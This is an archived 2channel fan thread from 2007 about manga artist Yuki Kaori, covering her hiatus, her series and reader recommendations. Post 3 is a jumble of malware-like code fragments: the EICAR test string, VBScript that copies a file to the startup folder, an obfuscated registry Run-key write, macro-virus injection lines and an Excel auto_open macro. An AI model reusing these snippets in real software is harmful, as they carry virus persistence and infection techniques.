2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【どうせ】由貴香織里21【変態スレですから】

1 :花と名無しさん:2007/08/23(木) 22:29:16 ID:???0
「わたくしはただの道化者『いかれスレ住人』とでもお呼び下さい」
めくるめく狂気の充溢した由貴香織里宇宙へようこそ!
馥郁たる頽廃の中に変態の大アルカナへの道があります。
一級変態士の資格を取って就職も有利にしましょう。
▽▲▽ 「ルードヴィッヒ革命」(別冊花とゆめ)連載終了、次回作に期待 ▽▲▽

前スレ
【艶美なる背徳】由貴香織里20【変態革命】
http://anime2.2ch.net/test/read.cgi/gcomic/1172486035/

荒らし、厨は無視しましょう。
どの作品への(偏)愛も平等に尊重され、各人の(偏)愛の形は作品の前に平等です。
スレ住人は相互に尊重と寛容に努めましょう。

次スレ(由貴香織里22)はおおむね以下の通りでお願いします。
・スレタイと>>1の文、テンプレ案の協議は >>950から
・次スレを立てるのは >>980

2 :花と名無しさん:2007/08/23(木) 22:31:15 ID:???0
▽▲▽ 関連リンク ▽▲▽
由貴香織里公式サイト
ttp://www.yukikaori.jp/
由貴香織里スレ過去ログ倉庫
ttp://f29.aaacafe.ne.jp/~gamegame/yuki/
コミケイトインタビュー
ttp://www.hakusensha.co.jp/comicate/comi_no53/yuki/yuki.html
耽美夢想マイネリーベ
ttp://www.nintendo.co.jp/n08/software/aymj/
ttp://www.konami.jp/gs/game/meineliebe/
ttp://www.meineliebe.jp/index.html

3 :花と名無しさん:2007/08/24(金) 00:53:15 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2007/08/25(土) 13:32:54 ID:???0
>>1
乙!

5 :花と名無しさん:2007/08/25(土) 15:51:26 ID:???O
>>1


6 :花と名無しさん:2007/08/25(土) 16:42:02 ID:???O
>>1
おつかれい〜

7 :花と名無しさん:2007/08/25(土) 20:40:19 ID:???0
由貴タン、いつ頃復帰すると思う?
1人目のときは4ヵ月後だったから12月頃かな
本格復帰には1年くらいかかりそうだけど

8 :花と名無しさん:2007/08/25(土) 20:58:29 ID:???0
何かブログ読む限り大変そうだしな…

9 :花と名無しさん:2007/08/25(土) 23:20:41 ID:NTZJIxy/0
無知なので荒れる話題だったらごめんね、
AAと犬って何?

10 :花と名無しさん:2007/08/26(日) 00:08:47 ID:???0
ブログ大変そうだよね。
別花で他作者の新連載が始まるとなぜか焦る・・・

>>9
前スレの3が犬、4が商品販売、6がAAだよ

11 :花と名無しさん:2007/08/26(日) 01:53:41 ID:???O
由貴さん復帰まで別花は買う気になれないな

早く戻ってきて欲しいけど、無理だけはしないでほしいな



12 :花と名無しさん:2007/08/27(月) 00:21:01 ID:???O
自分も由貴さん目当てだったから今月から買うの止めた
復帰時の予告絵が描き下ろしなら、それだけで別花買っちゃいそうw

13 :花と名無しさん:2007/08/27(月) 22:32:14 ID:r/yHc3FD0
>>10
ありがと

14 :花と名無しさん:2007/08/29(水) 18:54:06 ID:???0
しばらくネタがないから燃料灯火代わりに
天禁カインの完結記念インタでも載せようと思ったけど
ネタになるような内容じゃなかった(´・ω・`)
本誌にチロッと載ったやつだしな

15 :花と名無しさん:2007/08/29(水) 20:44:28 ID:???0
最近天使に興味持って本読んだりぐぐったりしてたけど、
ミカエルと魔王が兄弟ってのがオリジナルじゃなかったという事実に驚いた

あとサンダルフォンは音楽を司る天使だそうな
ライラの子守唄はそれに重ねてるのかな

16 :花と名無しさん:2007/08/29(水) 20:50:54 ID:???0
聖書とかでは兄弟と明言はされてないらしいね>ミカエルと魔王
ただルシファーとミカエルは双子のようにそっくり、という設定だけある。

17 :花と名無しさん:2007/08/29(水) 21:17:08 ID:???0
聖書ってはじめの家系図を延々と書いている辺りで挫折したが
天使とかについて書いてあるのは後半の方なんかい?

18 :花と名無しさん:2007/08/30(木) 00:23:15 ID:???0
挫折するの早すぎるよ

19 :花と名無しさん:2007/08/30(木) 00:34:17 ID:???0
厨房くらいの時に読んで一回挫折したけど高校の時に読破した
はじめて読んだ時は家系図に乗ってるキャラ全部覚えないといけないのかと思って絶望した

20 :花と名無しさん:2007/08/30(木) 20:35:43 ID:???0
>>17
系図云々って、新約聖書の共観福音書か。
聖書に天使の名前は新約・旧約合わせても2つ位しか出てこないそうだ。

>>19
聖書を読破ならすごいよ。
世界一読まれないベストセラー、というジョークもあるというのに。

21 :花と名無しさん:2007/08/31(金) 22:46:58 ID:???0
家に聖書2冊くらいあるけど全然読んでないw
大学の授業でキリスト教が必修だったから持ってるけど、本当に処分に困るよ。

22 :花と名無しさん:2007/09/01(土) 00:35:00 ID:???0
自分も学校で貰ったの持ってる
知ってる名前(天禁キャラ)を探し終わった後は開いてないやw

23 :花と名無しさん:2007/09/01(土) 20:19:10 ID:???0
悪魔側の七君主を見てると、悪魔側の方が圧倒的に有利に見えてしまう
まあ、バルベロみたいに天使のころに比べたら、全然違わなくない?というのもいるような気がするが
ベルゼビュート、レヴィヤタン、マモンあたりは、天使のときからあんな外見だったんだろうか・・・?

24 :花と名無しさん:2007/09/01(土) 22:21:12 ID:???0
ベルゼビュートはパタリロに出てきたのが
美形男だったから天禁で見て(その後、資料のほう見て)
ショックだった…(パタリロでの表記はベールゼブブ)
アスタロトはやっぱり美形なのか。

25 :花と名無しさん:2007/09/02(日) 01:51:10 ID:???0
>ベルゼビュート、レヴィヤタン、マモンあたりは、天使のときからあんな外見だったんだろうか・・・?

そうじゃない?
黄道十二天使のなかにも同じようなのがいたから
創世記の天使にはああいうのもデフォでいたのではないかと。

26 :花と名無しさん:2007/09/02(日) 04:34:35 ID:???0
ベリアルは元力天使だから天使としてめちゃ地位が高いわけでもないのに
七大君主やってたり、カタンは智天使という高い地位にありながら
智天使でござい!って力を発揮したわけでもない。
イマイチ力関係が解からない。
地位が高ければ持ってる力もそれに比例して高いだろうと思うんだけど。

27 :花と名無しさん:2007/09/02(日) 08:45:16 ID:9LQmFoJL0
ベリアルは副官だったでしょ?
各階級のトップ級はかなり偉いと思う。

28 :花と名無しさん:2007/09/03(月) 20:43:09 ID:???0
絵は綺麗だけど字は汚いね・・この人
カインシリーズの後書き読んでてそうおもた

29 :花と名無しさん:2007/09/03(月) 22:53:45 ID:???0
何を今更。

30 :花と名無しさん:2007/09/03(月) 23:01:01 ID:???0
問題は汚い汚い汚いといわれながら
改善・工夫が見られないことかと

31 :花と名無しさん:2007/09/03(月) 23:11:52 ID:???0
ヱヴァと天禁で共通の登場キャラはサンダルフォンだけか…。
ヱヴァの世界にミカちゃんとかベリ子さんが乱入したらおもしろいかも。

32 :花と名無しさん:2007/09/03(月) 23:13:15 ID:???0

ごめん、正しくは「名前がかぶるキャラ」ね。

33 :花と名無しさん:2007/09/04(火) 00:06:50 ID:???0
>>30
あの字が好きな人もいたりいなかったりするんだよ

34 :花と名無しさん:2007/09/04(火) 13:46:15 ID:???0
あの字でも読めなくはないから大丈夫
コミックス柱も今のシンプルなのも好きだけど
天禁の時くらいゴチャゴチャ書いてほしかったりする

35 :花と名無しさん:2007/09/04(火) 21:21:58 ID:???0
だよね

きれいとは言い難いけど、
熱意はつたわってくるよ。

36 :花と名無しさん:2007/09/05(水) 19:15:46 ID:???O
汚い字でも、
いっぱいゴチャゴチャ書いてある方が読み応えがあって好き

37 :花と名無しさん:2007/09/07(金) 00:02:04 ID:???0
休んでいる間に連載枠はもっと人気ある人に
もってかれそうです

38 :花と名無しさん:2007/09/07(金) 00:35:09 ID:???O
無理はしてほしくないけど、やっぱ由貴さんの作品は読みたいな


そういえば由貴さんそろそろデビューして20年近くなる?

39 :花と名無しさん:2007/09/07(金) 12:45:41 ID:???0
あと2年で20年になるのかな・・・?

40 :花と名無しさん:2007/09/07(金) 18:32:36 ID:???0
夏服のエリーがデビュー作なら今年の秋で20年じゃないっけ?


41 :花と名無しさん:2007/09/07(金) 20:03:29 ID:???0
由貴海里ってイラストレーターは姉妹かなにか?
絵もちょっと似ているから本屋さんでいつも目に入ってしまう

42 :花と名無しさん:2007/09/07(金) 21:45:47 ID:???0
誰かと思って検索してみたけど、ところどころ雰囲気似てるね
けど由貴タンの由貴は本名じゃないから、姉妹じゃないとオモ

43 :花と名無しさん:2007/09/07(金) 23:33:06 ID:???0
痛いんだよ

44 :花と名無しさん:2007/09/12(水) 01:05:00 ID:???0
微妙に燃料。

由貴キャラにやらせたい職業。

ラファエル → 銀行員。ホストより似合うかも。
ユリウス → メイド。言うまでもないな。
ロシエル → 何をやってもロシエルになる。


45 :花と名無しさん:2007/09/12(水) 21:34:31 ID:???0
スーツ着て長文説明かます銀行員ラファエルと、
活字いっぱいでパニックになってキレるミカちゃんを想像したw

46 :花と名無しさん:2007/09/12(水) 21:37:23 ID:???0
ニート以外つとまんねーだろどうせ

47 :花と名無しさん:2007/09/12(水) 23:24:17 ID:???0
ルーイは仕事は思い切り出来るだろうな。
ラファエルと対決する外資ファンドとか硬派経済ドラマな世界がやれそうw
ついでに美女の奪い合いでも対決だw


48 :花と名無しさん:2007/09/13(木) 11:27:54 ID:???0
昨日今日と2日かけて、初めて「天使禁猟区」を読破した。
(古本屋でたまたま立ち読みした1巻に惹かれて、そのまま大人買い。)
読んだ感想はいろいろあるんだけど、やっぱ「ラファエルかっこいい!」が先に出てくるw
弱いんだよね、女ったらしで軽口叩くけど実は…みたいなキャラ。
ラファエルに感情移入してたからこそ、沙羅との決着をきちんと付けさせてあげたかった気もする。
なんか、刹那と九雷よりも弱い気がした。気持ちのケリの付け方が。
でもどうせフラれるし、あれで良かったのかな。
家にある大学の授業のために買った聖書、ちゃんと読んでみようっと。

49 :花と名無しさん:2007/09/13(木) 23:16:00 ID:???0
>>48
由貴ワールドへようこそ。
久々にこのスレで熱い思い入れを聞いた気がします。
よろしければ、由貴先生の他の作品もどうぞ。


50 :花と名無しさん:2007/09/14(金) 01:34:21 ID:???0
>>49
>>48です。レスありがとうございます。
ん〜、私的に最後の終わり方は、
「主役カプ2人だけ死に、かつ2人が存在していた事は世間から無かったことにされるが、
他の巻き込んでしまった人間(瑠璃とか加藤とか)は、何事もなかったかの様に蘇る…。」
みたいなのを想像していたので、正直ちょっと拍子抜けでしたw
すみません、結構アンハッピーエンド好きなんです…。
あ、でも片方だけ死んで片方は生き残るみたいなのは嫌だったんで(一番泣けるけどw)、
二人生きるなら二人生きる、二人死ぬなら二人死ぬ、のどちらかを望んでいたので、まだ良かったです。
時々、「ん?」と思うトコはありますが、宗教観念(天使とか悪魔とか神とか)を元によく練られた作品だと思います。
それで、あの、ずうずうしいのですが、由貴先生の他作品でオススメとかあれば教えて頂ければ幸いです。

51 :花と名無しさん:2007/09/14(金) 12:53:32 ID:???0
>>44 >>47
ラファエルとルーイの対決、想像できる。見てみたい。
「ロシエルは何をやってもロシエルになる」に笑った。
ナイス燃料。


52 :花と名無しさん:2007/09/14(金) 18:05:55 ID:???0
>>50
とりあえずルードヴィッヒ革命と伯爵カインシリーズを読んでミソ
それも面白いと感じれば、残りの作品も買ってみればいいと思うよ

53 :花と名無しさん:2007/09/14(金) 19:40:08 ID:???O
少年残像ははずせないね〜
もしカインシリーズが気に入ったら、
ゴッドチャイルドはできればスルーで

54 :花と名無しさん:2007/09/14(金) 20:09:01 ID:???O
パッ!出たっ!!

55 :花と名無しさん:2007/09/14(金) 21:29:46 ID:???0
>>52>>53
>>48=>>50です。
おすすめレスありがとうございます。
今ちょうど大学が休みでヒマなので、読んでみようと思います。ではノシ

56 :花と名無しさん:2007/09/15(土) 00:25:33 ID:???0
やっぱルーイいいよね
男前だし

57 :花と名無しさん:2007/09/15(土) 02:08:38 ID:???0
>>55
あえて言うとお奨めは「全部」ですね。
というのは、作者も登場人物も読者・スレ住人も個性とこだわりと感性が尋常でない変態ばかりで、
何がいいかを素直に言えないからです。
>>53-54のように(過去ログみるとわかりますが)意見がある意味猛烈に割れてしまうものもあります。

とはいえ、このスレとしては、住人が何が好きであっても、どのように好きであっても、
他の住人は寛容に受け止めて尊重してほしい場であることを>>1に掲げています。

58 :花と名無しさん:2007/09/15(土) 16:21:34 ID:???O
この人の作品は天使禁猟区しか読んでないんですが質問させてください。

今週、深夜アニメのクレイモア(初見)で化け物に成り果てた人物が屍肉を食い散らかす
で、こうなる前に私の首を撥ねてくれって台詞がありました。
おまけにその人、背中に羽根生えて飛んでってしまうし、寝呆け眼だったので
てっきり天使〜がアニメ化したのかと思ってしまった。これはパクリ?
それとも有りがちなシーンなんでしょうか?由貴スレで話題に上がったことはありますか?


携帯から流れ豚切りスマソ

59 :花と名無しさん:2007/09/15(土) 16:41:07 ID:???0
そのアニメは未見だけど…

敵に操られるとか薬打たれるとか化け物にされるとかで
自分でコントロールきかなくなって暴走するから「殺してくれ」
っていうのはありがちだと思うよ。

ファンタジーとかSFで天使っぽいものが出てくるのもありがちだろうし。

60 :花と名無しさん:2007/09/15(土) 23:29:48 ID:???0
由貴たんはありがちシーンがたっぷり

だいたいいろんなメディアに影響うけてんだから
事情はみんな似たようなもんでしょ

61 :花と名無しさん:2007/09/18(火) 21:54:35 ID:???0
>>58
原作のクレイモアも読んだことあるけど、
パクリとはまったく思わなかった。
確かあの話の設定では、剣士は全員そのうち
化け物になっちゃうんだよな。
単にありがちなシーンてことでしょう。

62 :花と名無しさん:2007/09/19(水) 00:48:39 ID:???0
ザフィケルのそのシーン、インパクト大だよね
ありがちシーンでも度肝抜かれたよ

63 :>>58:2007/09/19(水) 00:55:59 ID:???O
>>59-61
レスありがとうございます。
そうか。やっぱりありがちなシーンなんですね。
天使〜は自分的にはデビルマンくらいの衝撃だったのですw
同業者にも影響を与えた結果パクられた…と勝手に先走ってしまいました。
クレイモアファンの方がいらっしゃいましたら、大変失礼な発言お許しください。

64 :花と名無しさん:2007/09/19(水) 12:55:37 ID:???0
少女漫画読んでいる男より、少年漫画読んでる女のが多いよ。

稀に少女漫画好きな男がいたりする。友人の弟が
天禁のボックス持ってるらしいぞ。その当時の花夢の漫画が好きらしい。


65 :花と名無しさん:2007/09/19(水) 20:22:04 ID:???0
>>63
ありがちかどうかは存じませんが、変態さは他の追随を許さないのが由貴先生。

>>64
お嬢さんと由貴先生の作品を読んでいる?パパさん?が過去スレに居られませんでしたっけ?


66 :花と名無しさん:2007/09/23(日) 23:35:43 ID:???0
微妙な燃料
脱いだらすごいという理由だけで、小島よしおの物まねをするルーイ。
キャラが正反対なようで実は似ているという理由で、にしおかすみこの物まねをするドロテア。


67 :花と名無しさん:2007/09/28(金) 18:05:03 ID:???0
「はい、OPPAPPI−」

68 :花と名無しさん:2007/10/01(月) 13:32:42 ID:???O
友人に良い漫画ない?って聞かれたから、少年残像すすめたら、ページ開いた瞬間からドン引きされてしまった。

由貴作品を、人にすすめるなら何が無難だったんだろうか…

69 :花と名無しさん:2007/10/01(月) 16:10:32 ID:???0
絵の安定した感じからだとゴッドチャイルドか革命かな?
少年残像みたいな空気が苦手な友人には特に・・・

70 :花と名無しさん:2007/10/01(月) 20:25:57 ID:???0
一般受けなら夜型が良かったらしいよ

71 :花と名無しさん:2007/10/01(月) 23:14:06 ID:???0
確かに夜型はドラマ化もしたし逆ハーだから無難かもね。
夜型やルー革くらいのオカルト・ファンタジー度でさえ苦手な人は
由貴作品自体があまり好みでないって感じかも。

72 :花と名無しさん:2007/10/02(火) 00:49:41 ID:???0
0の奏香師も一般人にはおすすめ
一般人に少年残像はハードランディング(by絶望先生)だよ

一般人の由貴作品のソフトランディング

夜型or0奏→妖精→ルー革→ゴッチャ→少年残像→天禁

73 :花と名無しさん:2007/10/02(火) 14:33:46 ID:???0
革命は話が進むたびに絵が荒くなるのが微妙・・だった

74 :花と名無しさん:2007/10/02(火) 15:46:10 ID:???O
妊娠してたから、仕方ないって

ちょっと無理矢理にしろ最後まで書ききった由貴タンを尊敬するよ

75 :花と名無しさん:2007/10/02(火) 17:34:52 ID:???0
まあ個人的に由貴さんの絵だとシリアスの方が似合う気がするけどね
ギャグばっかりも悪くは無いけど

76 :花と名無しさん:2007/10/02(火) 21:34:01 ID:???O
自分は天禁・少年残像・砂礫がすごい好き
初コミックスで描きたいと言ってた3本だから下積み時代にずっと温めてたんだろうな

77 :花と名無しさん:2007/10/03(水) 16:13:03 ID:???0
ちょっと読みたいって時に天禁・少年残像は重たいだろうね

78 :花と名無しさん:2007/10/03(水) 22:07:04 ID:???0
>74

わたしは73じゃないけど、
妊娠してたからとか
そういう作者の都合は
作品評価のときに考慮しない。

プロなんだから、
最低限自分が納得できる作品を
作ったんだろうし。

わたしは由貴先生の大ファンですが、
ルー革命は正直、
絵が雑で残念だと思いました。


79 :花と名無しさん:2007/10/04(木) 00:56:20 ID:???O
由貴タン再始動キター
今コミックス手直しってことは12月発売っぽいな
年末には新作も読めそう

80 :花と名無しさん:2007/10/05(金) 15:44:55 ID:???0
>>78
まあ分かる。自分は絵が雑でも十分美麗だと思ったけどね

81 :花と名無しさん:2007/10/05(金) 16:18:32 ID:???O
由貴さん作品で最後まで読めたの戒音だけだったな…
由貴さんの作品て情報量が;
戒音はラルク好きだったからメンバー当て嵌めて一人で喜んでたw
当て嵌めたのは一個前のメンバーで


チラ裏失礼しました

82 :花と名無しさん:2007/10/05(金) 19:17:59 ID:???0
情報量は本当にすごいよね
スカスカ漫画しか読んでなかった自分は
あの駆け足展開が病みつきになった

83 :花と名無しさん:2007/10/06(土) 19:29:13 ID:???0
>>81
由貴さんの漫画ですら理解できない脳みそなら
快感フレーズでも読んでればいいよ

84 :花と名無しさん:2007/10/06(土) 19:36:00 ID:???0
>>83
感じ悪いんですけど
だいたい由貴さん漫画から快フレなんランクが下がりすぎでしょ
ダイアモンドからルビーもサファイヤも飛ばして
いきなり道端の小石みたいなもんじゃないの

85 :花と名無しさん:2007/10/06(土) 19:59:57 ID:???O
小石ワロタwww

86 :花と名無しさん:2007/10/06(土) 23:34:43 ID:???0
眉タソは意外と面白いよ。
眉タソの漫画に突っ込み入れるサイト見たことあるんだけど、腹筋崩壊したw

87 :花と名無しさん:2007/10/07(日) 05:03:57 ID:???O
面白いの意味が違うだろうwww


そろそろスレチなんで止めるか

88 :花と名無しさん:2007/10/07(日) 09:35:19 ID:???0
>>86
手が伸びてるヤツとかかw
あれ面白いよな。


ルーイ最終巻の加筆ってどれくらいあるのかな。
最後が駆け足だったからドロテアとかの事にちょっと追加があるといいな。

89 :花と名無しさん:2007/10/07(日) 17:06:08 ID:???0
で、どんな追加がいい?

・王子に足蹴にされるドロテアの大幅増量。
・王子に足蹴にされるヴィルの大幅増量。
・女王に足蹴にされる王様の大幅増量。

90 :花と名無しさん:2007/10/07(日) 20:36:29 ID:???0
・リゼッテに足蹴にされるヴィルの大幅増量。

91 :花と名無しさん:2007/10/09(火) 08:51:48 ID:???0
ドロテアorリゼッテorヴィル 個別END追加
(なぜかゲームブック方式)

92 :花と名無しさん:2007/10/10(水) 23:36:43 ID:???0
・キャラの妄想コスプレその他描きおろし20枚。
ドロテアバディのイーディケとか、白雪のレースクイーンとか、
メイドのヴィル子さんとか。

>>91
エンドが袋とじになっていて、どのエンドになるか買ってみないとわからない。
完全制覇するには最低3冊買わないといけない。

93 :花と名無しさん:2007/10/11(木) 20:13:42 ID:???O
そんなに仕事したら由貴さん倒れてしまう!


でもちょっと見たいかも


ルー革は続き描いてくれるのかな?

94 :花と名無しさん:2007/10/11(木) 20:32:37 ID:???0
本人が描きたいって言ってるから描くんじゃない?
由貴さんって自分の描きたいものを描くってイメージ
1巻の時みたいなたまに読み切りで、って形式のほうがいいなぁ
せっかく連載枠が貰えるんなら一話完結じゃない話が読みたいし

95 :花と名無しさん:2007/10/16(火) 14:35:11 ID:???0
ていうか、ファンの声をあまり気にしないでしょうね
ゴッチャファンとかはもう露骨にうざがってたしね・・・
まあ態度悪くて、価値観を押し付ける連中が悪いんだけど

普通にアンケ書いたり、コミックス買ってくれる人には
感謝してると思うけどね

96 :花と名無しさん:2007/10/16(火) 20:59:31 ID:???0
ファンの声を気にしない、とは違うけど由貴さんが
「読者に応えて続編・番外編を描いてみましたテヘ」って
タイプじゃなくて本当に良かったと心から思ってる

97 :花と名無しさん:2007/10/17(水) 16:50:10 ID:???0
良くも悪くも人の話聞かなそう

98 :花と名無しさん:2007/10/17(水) 21:47:48 ID:???0
少年残像のような続編の描きようがない
作品はしょうがないとして、
あれだけ人気があっても天禁の続編はないだろうね。
渾身の代表作だもんねぇ。

99 :花と名無しさん:2007/10/18(木) 23:25:03 ID:???O
周りの声に惑わされやすい人じゃなくて良かった

100 :花と名無しさん:2007/10/19(金) 01:59:39 ID:???0
ヒロインの造形に関してはもう少しファンの声も聞いてくれよと思わんでもないが
まあそれも含めて許容されてるんだろうからこれでいいのかな

101 :花と名無しさん:2007/10/19(金) 15:53:28 ID:???0
友達に持ってる由紀漫画全部貸したら「絵が綺麗」「話が綺麗」
とかなり気に入ってた

ただルードヴィッヒ革命は「この作者さんにギャグやって欲しくない」
って言ってたけどね(絵については触れてなかった)
彼女と同じ感想の人って居るのか?

102 :花と名無しさん:2007/10/19(金) 16:40:07 ID:???0
>>101
自分がそんな感じだ。この人の見開きはかなり印象的で好きだから
それが生かせないギャグは確かにあんまりやってほしくない

でも友人には「ルードヴィッヒ革命が一番面白い」って子もいるし、
好みの問題なんだろうね・・・

103 :花と名無しさん:2007/10/19(金) 21:10:07 ID:???0
自分もギャグはやってほしくない派
息つく暇のない怒涛の展開ってのが好きだから
ギャグ入れられるとテンポが悪く感じてしまう
面白いからいいんだけどね

104 :花と名無しさん:2007/10/19(金) 21:19:05 ID:???0
由貴スレ住人って他の少女漫画家スレより
カーネリアンや狩野ハスミやバスタードとかの好き率高そう・・・

105 :花と名無しさん:2007/10/20(土) 03:38:27 ID:???0
自分はルー革読んでると、由貴さんが昔出してた
同人誌読んでる気分になれて、ある意味懐かしく感じる。

この雰囲気は嫌いではないけど、そろそろ濃いのが読みたいな。


106 :花と名無しさん:2007/10/21(日) 00:21:10 ID:???0
>>105
濃いの。
シリアス壮大幻想的スペクタクル大長編をもう一度ですか!同意。
もちろん変態・美男子満載で

107 :花と名無しさん:2007/10/21(日) 02:18:14 ID:???O
>>106
それかなり切望。読み切りや短期連載は数が多いから満足感がある
由貴タンの伏線の使い方や沢山出てくる個性的なキャラって長期連載の方が断然活かせそう
てか長期連載の方が追いかけるが楽しくて好きなんだよー

108 :花と名無しさん:2007/10/21(日) 10:25:53 ID:???0
>>105-107
同意

109 :花と名無しさん:2007/10/21(日) 12:02:05 ID:???0
>もちろん変態・美男子満載で
ワラタ
いかれ帽子屋みたいなのも追加しといてw

110 :花と名無しさん:2007/10/21(日) 15:44:28 ID:???0
狙った感がちょっと多いギャグよりも
濃い感じの方が見てて好き

天禁の帽子屋が最高に好きだった

111 :花と名無しさん:2007/10/21(日) 18:40:33 ID:???O
育児で忙しいから難しいのでしょうか
後書きや日記の厨臭は芸風ですか

112 :花と名無しさん:2007/10/21(日) 19:14:56 ID:???0
わたしも
帽子屋ほんとにすきだったわー。

ギャグは早くやめてほしい。
というか

せりふはギャグっぽくてもいいから
絵をギャグにしないで欲しい。

113 :花と名無しさん:2007/10/21(日) 22:24:15 ID:???0
革命の青髭の「迂闊だった」「迂闊ですむか」
のギャグは結構好きだけどな〜

114 :花と名無しさん:2007/10/21(日) 22:43:28 ID:???0
あの画面とうらはらの
そういうさりげないボケとツッコミギャグもいい味出してるね


115 :花と名無しさん:2007/10/22(月) 00:42:50 ID:???0
リア厨時代、帽子屋に萌えたらノーマルなのか、アブなのか悩んだ記憶があるw
今は女でもないよな?とか、体はどうなってるんだ?とか
人間は、神が作った境界線こだわるって!

116 :花と名無しさん:2007/10/22(月) 23:43:41 ID:???0
>>115
で、今は帽子屋に萌えたらどっちだとお思いですか?

117 :花と名無しさん:2007/10/23(火) 01:49:53 ID:???0
女じゃなければノーマルだお(`・ω・´)シャキーン

118 :花と名無しさん:2007/10/23(火) 20:15:35 ID:???0
ノーマルかどうかはともかく変態であることは断言できますよね。このスレ住人なんだし。

119 :花と名無しさん:2007/10/23(火) 20:18:52 ID:???0
http://yaplog.jp/supreme_heaven/

120 :花と名無しさん:2007/10/23(火) 22:19:42 ID:???0
私は女だがオスカル様好きだぞ

121 :花と名無しさん:2007/10/24(水) 00:04:52 ID:???0
絵に描かれた相手の性別どうこうで
ノーマルも変態もなかろうに ご苦労さんなこった

122 :花と名無しさん:2007/10/24(水) 17:26:40 ID:???0
ぱんなこった

123 :花と名無しさん:2007/10/24(水) 19:04:06 ID:???O
次の連載はどんなのをやるだろうね?
赤子がいるから厳しいだろうけど
そろそろがっつり濃いのを読みたいっす。
天禁クラスの変態祭りでよろしく頼むよ。

124 :花と名無しさん:2007/10/24(水) 22:16:57 ID:???0
天禁とカインの終了後にそれぞれあったインタビューにあった
「次はどんな連載を?」っていう質問の回答に挙げてたやつを描いてほしい

125 :花と名無しさん:2007/10/24(水) 23:28:54 ID:???0
カイン終わったあとに
描きたいのがいっぱいあるって言ってたもんねえー

126 :花と名無しさん:2007/10/25(木) 00:02:04 ID:???0
脇役でもいいから、また萌える主従をお願いしたい。

127 :花と名無しさん:2007/10/25(木) 00:22:52 ID:???0
由貴たんは別に主従ネタには ハァ? な人で
話の都合で出しているだけだそうだが

主従関係だと話を作りやすいのかもねー?

由貴たんの萌えるものはなんだろう
を存分に描いてくれ

128 :花と名無しさん:2007/10/25(木) 21:24:41 ID:???0
由貴タンの萌えるもの

つ巨乳

129 :花と名無しさん:2007/10/25(木) 23:03:32 ID:???0
でもイディーケとか蛙の王様の姫さまとかお気に入り系は
まな板おおいね

130 :花と名無しさん:2007/10/26(金) 17:04:14 ID:???0
ハァハァして弄りたいものが巨乳で
入れ込んで持ち上げたいのがお気に入り系なんじゃない?

131 :花と名無しさん:2007/10/28(日) 18:43:01 ID:???0
萌えるものをまとめると、商品販売(ただし住人は除く)になるんじゃない?

132 :花と名無しさん:2007/10/28(日) 22:56:38 ID:???0
別花が発売するとまず予告に由貴タンがいないか探しちゃう

133 :花と名無しさん:2007/10/29(月) 17:33:49 ID:urrn6fw50
早く次の連載をタノム!由貴先生!

134 :花と名無しさん:2007/10/29(月) 23:21:41 ID:???O
早く由貴さんの新作が読みたい

最近餓えてきた

135 :花と名無しさん:2007/10/31(水) 00:35:25 ID:???0
早く新作を投与しないと禁断症状で>>133たんと>>134たんが…

壱) もっと変態が進行する。
弐) 真人間に戻ってしまう。
参) 屍人形なので崩壊する。

どれだ?

136 :花と名無しさん:2007/11/02(金) 00:47:38 ID:???0
4巻発売が告知されたね
販売促進がてら12月発売の別花で復帰すると思ったけど
予告には一切触れられてなかったしなぁ

137 :花と名無しさん:2007/11/02(金) 22:08:36 ID:???O
ザ花で妖精標本の続編がスタート!
って夢を見た。夢の中でパニクった

138 :花と名無しさん:2007/11/05(月) 12:22:33 ID:???0
今更、ゴッチャ最終巻読んだ。
金髪ロリ美少女だったマリーが、成長しててその上オスカー相手に妊娠までしてたコトにショックを受けた。
でも、マリーとオスカーなら明るい家庭になりそう。そして、子供多そう。

139 :花と名無しさん:2007/11/05(月) 20:20:03 ID:???O
ゴッチャは話のやっつけ度や破綻がすごくてなー。
当時はスレの雰囲気も悪かったよ。
旧シリーズで終わっていれば名作だったねえ。
つか、ゴッチャはジザベルが全てです。

140 :花と名無しさん:2007/11/05(月) 20:28:22 ID:???0
デライラなんて出さずに、猟奇話ばかりで短編を続けてくれてれば良かったというのは、個人的感想
ヒロインはエメライン一択で

141 :花と名無しさん:2007/11/05(月) 22:37:33 ID:???0
赤い羊までは神だった

天禁の問答無用ぶっちぎりという勢いは
なかったけど、フンイキがあったね

142 :花と名無しさん:2007/11/06(火) 00:59:06 ID:???O
ゴッチャ、3巻まではまだよかった。

143 :花と名無しさん:2007/11/06(火) 01:27:37 ID:???O
たまたま程度が低い人が混ざっていただけでしょう。
大方の人は由貴漫画が好きで、あれはだめこれはいい、とまでは
むきになってないと思うよ。
確かにジザは萌え〜。

144 :花と名無しさん:2007/11/06(火) 10:20:14 ID:???0
赤い羊まではほんと神だったよね。懐かしいな。
天禁は肌に合わなかったので早々にブコフへ嫁にやった。
ゴッチャは未読なんだが、思い出は美しいままにしておきたいので、
これからもたぶん読まないんだろうなぁ。

145 :花と名無しさん:2007/11/06(火) 10:30:38 ID:???0
そこに至る経緯はともあれ、
ゴッチャのラストで泣いた自分は少数派か。

146 :花と名無しさん:2007/11/06(火) 11:48:47 ID:???O
霊媒師が生き残ったのが意外だった


147 :花と名無しさん:2007/11/06(火) 15:10:24 ID:???O
天禁が長編だったから、次は軽めギャグでもよかったな。
ゴッチャはあれはあれでいいけど、他で良質な英国漫画が豊作だっただけに
あんまり売れなかったねー。
